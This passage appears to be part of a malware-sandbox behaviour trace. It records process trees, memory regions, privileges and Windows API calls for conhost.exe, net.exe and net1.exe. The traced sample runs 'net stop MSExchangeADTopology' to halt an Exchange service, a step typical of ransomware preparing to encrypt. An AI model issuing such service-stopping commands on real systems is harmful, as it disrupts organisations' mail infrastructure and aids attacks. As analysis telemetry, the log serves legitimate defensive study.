dwMode=0x3) returned 1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.857] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0142.858] _get_osfhandle (_FileHandle=0) returned 0x38 [0142.858] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0142.858] SetConsoleInputExeNameW () returned 0x1 [0142.858] GetConsoleOutputCP () returned 0x1b5 [0142.858] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0142.858] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.858] exit (_Code=2) Thread: id = 790 os_tid = 0xdb0 Process: id = "274" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2ac1d000" os_pid = "0xdec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "273" os_parent_pid = "0xe10" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12915 start_va = 0x7fd0b000 end_va = 0x7fd0bfff entry_point = 0x0 region_type = private name = "private_0x000000007fd0b000" filename = "" Region: id = 12916 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12917 start_va = 0x67c1390000 end_va = 0x67c13affff entry_point = 0x0 region_type = private name = "private_0x00000067c1390000" filename = "" Region: id = 12918 start_va = 0x67c13b0000 end_va = 0x67c13c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000067c13b0000" filename = "" Region: id = 12919 start_va = 0x67c13d0000 end_va = 0x67c140ffff entry_point = 0x0 region_type = private name = "private_0x00000067c13d0000" filename = "" Region: id = 12920 start_va = 0x7df5fff60000 end_va = 0x7ff5fff5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff60000" filename = "" Region: id = 12921 start_va = 0x7ff6c4150000 end_va = 0x7ff6c4172fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4150000" filename = "" Region: id = 12922 start_va = 0x7ff6c417c000 end_va = 0x7ff6c417dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c417c000" filename = "" Region: id = 12923 start_va = 0x7ff6c417e000 end_va = 0x7ff6c417efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c417e000" filename = "" Region: id = 12924 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 12925 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12926 start_va = 0x67c1390000 end_va = 0x67c139ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000067c1390000" filename = "" Region: id = 12927 start_va = 0x67c1410000 end_va = 0x67c14cdfff entry_point = 0x67c1410000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12928 start_va = 0x67c1520000 end_va = 0x67c161ffff entry_point = 0x0 region_type = private name = "private_0x00000067c1520000" filename = "" Region: id = 12929 start_va = 0x7ff6c4050000 end_va = 0x7ff6c414ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4050000" filename = "" Region: id = 12930 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12931 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12932 start_va = 0x67c13a0000 end_va = 0x67c13a6fff entry_point = 0x0 region_type = private name = "private_0x00000067c13a0000" filename = "" Region: id = 12933 start_va = 0x67c14d0000 end_va = 0x67c150ffff entry_point = 0x0 region_type = private name = "private_0x00000067c14d0000" filename = "" Region: id = 12934 start_va = 0x67c1510000 end_va = 0x67c1510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000067c1510000" filename = "" Region: id = 12935 start_va = 0x67c1620000 end_va = 0x67c1626fff entry_point = 0x0 region_type = private name = "private_0x00000067c1620000" filename = "" Region: id = 12936 start_va = 0x67c1630000 end_va = 0x67c1630fff entry_point = 0x0 region_type = private name = "private_0x00000067c1630000" filename = "" Region: id = 12937 start_va = 0x67c1640000 end_va = 0x67c1640fff entry_point = 0x0 region_type = private name = "private_0x00000067c1640000" filename = "" Region: id = 12938 start_va = 0x67c17a0000 end_va = 0x67c17affff entry_point = 0x0 region_type = private name = "private_0x00000067c17a0000" filename = "" Region: id = 12939 start_va = 0x67c17b0000 end_va = 0x67c1937fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000067c17b0000" filename = "" Region: id = 12940 start_va = 0x67c1940000 end_va = 0x67c1ac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000067c1940000" filename = "" Region: id = 12941 start_va = 0x67c1ad0000 end_va = 0x67c2ecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000067c1ad0000" filename = "" Region: id = 12942 start_va = 0x7ff6c417a000 end_va = 0x7ff6c417bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c417a000" filename = "" Region: id = 12943 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 12944 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 12945 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12946 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 12947 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12948 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12949 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12950 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12951 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12952 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12953 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 12954 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 787 os_tid = 0xde0 Thread: id = 788 os_tid = 0x394 Thread: id = 789 os_tid = 0xe08 Process: id = "275" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x3e41a000" os_pid = "0x354" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "273" os_parent_pid = "0xe10" cmd_line = "net stop MSExchangeADTopology\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12968 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 12969 start_va = 0xd50000 end_va = 0x4d4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 12970 start_va = 0x4d50000 end_va = 0x4d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 12971 start_va = 0x4d70000 end_va = 0x4d71fff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 12972 start_va = 0x4d80000 end_va = 0x4d93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d80000" filename = "" Region: id = 12973 start_va = 0x4da0000 end_va = 0x4ddffff entry_point = 0x0 region_type = private name = "private_0x0000000004da0000" filename = "" Region: id = 12974 start_va = 0x4de0000 end_va = 0x4e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 12975 start_va = 0x4e60000 end_va = 0x4e63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e60000" filename = "" Region: id = 12976 start_va = 0x4e70000 end_va = 0x4e70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e70000" filename = "" Region: id = 12977 start_va = 0x4e80000 end_va = 0x4e81fff entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 12978 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12979 start_va = 0x7ea40000 end_va = 0x7ea62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea40000" filename = "" Region: id = 12980 start_va = 0x7ea64000 end_va = 0x7ea64fff entry_point = 0x0 region_type = private name = "private_0x000000007ea64000" filename = "" Region: id = 12981 start_va = 0x7ea6a000 end_va = 0x7ea6cfff entry_point = 0x0 region_type = private name = "private_0x000000007ea6a000" filename = "" Region: id = 12982 start_va = 0x7ea6d000 end_va = 0x7ea6dfff entry_point = 0x0 region_type = private name = "private_0x000000007ea6d000" filename = "" Region: id = 12983 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12984 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12985 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12986 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12987 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12988 start_va = 0x5050000 end_va = 0x505ffff entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 12989 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12990 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12991 start_va = 0x4f50000 end_va = 0x504ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f50000" filename = "" Region: id = 12992 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 791 os_tid = 0xdf4 Thread: id = 792 os_tid = 0xb00 Process: id = "276" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x3e7a3000" os_pid = "0x9c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "275" os_parent_pid = "0x354" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeADTopology\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12993 start_va = 0xaf0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 12994 start_va = 0xb10000 end_va = 0xb11fff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 12995 start_va = 0xb20000 end_va = 0xb33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 12996 start_va = 0xb40000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 12997 start_va = 0xb80000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 12998 start_va = 0xc00000 end_va = 0xc03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 12999 start_va = 0xc10000 end_va = 0xc10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 13000 start_va = 0xc20000 end_va = 0xc21fff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 13001 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 13002 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 13003 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 13004 start_va = 0x7f2a0000 end_va = 0x7f2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f2a0000" filename = "" Region: id = 13005 start_va = 0x7f2ca000 end_va = 0x7f2ccfff entry_point = 0x0 region_type = private name = "private_0x000000007f2ca000" filename = "" Region: id = 13006 start_va = 0x7f2cd000 end_va = 0x7f2cdfff entry_point = 0x0 region_type = private name = "private_0x000000007f2cd000" filename = "" Region: id = 13007 start_va = 0x7f2ce000 end_va = 0x7f2cefff entry_point = 0x0 region_type = private name = "private_0x000000007f2ce000" filename = "" Region: id = 13008 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13009 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 13010 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 13011 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13012 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 13013 start_va = 0xcb0000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 13014 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 13015 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 13016 start_va = 0xdc0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 13017 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 13018 start_va = 0xaf0000 end_va = 0xafffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 13019 start_va = 0xb00000 end_va = 0xb03fff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 13020 start_va = 0xc30000 end_va = 0xc6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 13021 start_va = 0xcc0000 end_va = 0xd7dfff entry_point = 0xcc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13022 start_va = 0xec0000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 13023 start_va = 0x5280000 end_va = 0x528ffff entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 13024 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 13025 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 13026 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 13027 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 13028 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 13029 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 13030 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 13031 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 13032 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 13033 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 13034 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 13035 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 13036 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 13037 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 13038 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 13039 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 13040 start_va = 0x7f1a0000 end_va = 0x7f29ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1a0000" filename = "" Region: id = 13041 start_va = 0x7f2c7000 end_va = 0x7f2c9fff entry_point = 0x0 region_type = private name = "private_0x000000007f2c7000" filename = "" Region: id = 13042 start_va = 0xb10000 end_va = 0xb13fff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 13043 start_va = 0xc70000 end_va = 0xc72fff entry_point = 0xc70000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 13044 start_va = 0xd80000 end_va = 0xdb1fff entry_point = 0xd80000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 793 os_tid = 0x908 [0142.836] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0142.836] __set_app_type (_Type=0x1) [0142.836] __p__fmode () returned 0x77ac4d6c [0142.836] __p__commode () returned 0x77ac5b1c [0142.836] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0142.836] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0142.836] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.836] GetConsoleOutputCP () returned 0x1b5 [0142.837] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0142.837] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.839] sprintf_s (in: _DstBuf=0xbff8b8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0142.839] setlocale (category=0, locale=".437") returned="English_United States.437" [0142.840] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0142.840] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0142.840] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeADTopology\"" [0142.840] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xbff660, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0142.840] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xbff654 | out: Buffer=0xbff654*=0xdc8000) returned 0x0 [0142.840] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xbff658 | out: Buffer=0xbff658*=0xdc8090) returned 0x0 [0142.840] __iob_func () returned 0x77ac1208 [0142.840] _fileno (_File=0x77ac1208) returned 0 [0142.840] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0142.840] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0142.840] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0142.840] _wcsicmp (_String1="config", _String2="stop") returned -16 [0142.840] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0142.840] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0142.840] _wcsicmp (_String1="file", _String2="stop") returned -13 [0142.840] _wcsicmp (_String1="files", _String2="stop") returned -13 [0142.840] _wcsicmp (_String1="group", _String2="stop") returned -12 [0142.840] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0142.840] _wcsicmp (_String1="help", _String2="stop") returned -11 [0142.840] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0142.840] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0142.840] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0142.840] _wcsicmp (_String1="session", _String2="stop") returned -15 [0142.840] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0142.840] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0142.840] _wcsicmp (_String1="share", _String2="stop") returned -12 [0142.840] _wcsicmp (_String1="start", _String2="stop") returned -14 [0142.840] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0142.840] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0142.840] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0142.840] _wcsicmp (_String1="accounts", _String2="MSExchangeADTopology") returned -12 [0142.840] _wcsicmp (_String1="computer", _String2="MSExchangeADTopology") returned -10 [0142.841] _wcsicmp (_String1="config", _String2="MSExchangeADTopology") returned -10 [0142.841] _wcsicmp (_String1="continue", _String2="MSExchangeADTopology") returned -10 [0142.841] _wcsicmp (_String1="cont", _String2="MSExchangeADTopology") returned -10 [0142.841] _wcsicmp (_String1="file", _String2="MSExchangeADTopology") returned -7 [0142.841] _wcsicmp (_String1="files", _String2="MSExchangeADTopology") returned -7 [0142.841] _wcsicmp (_String1="group", 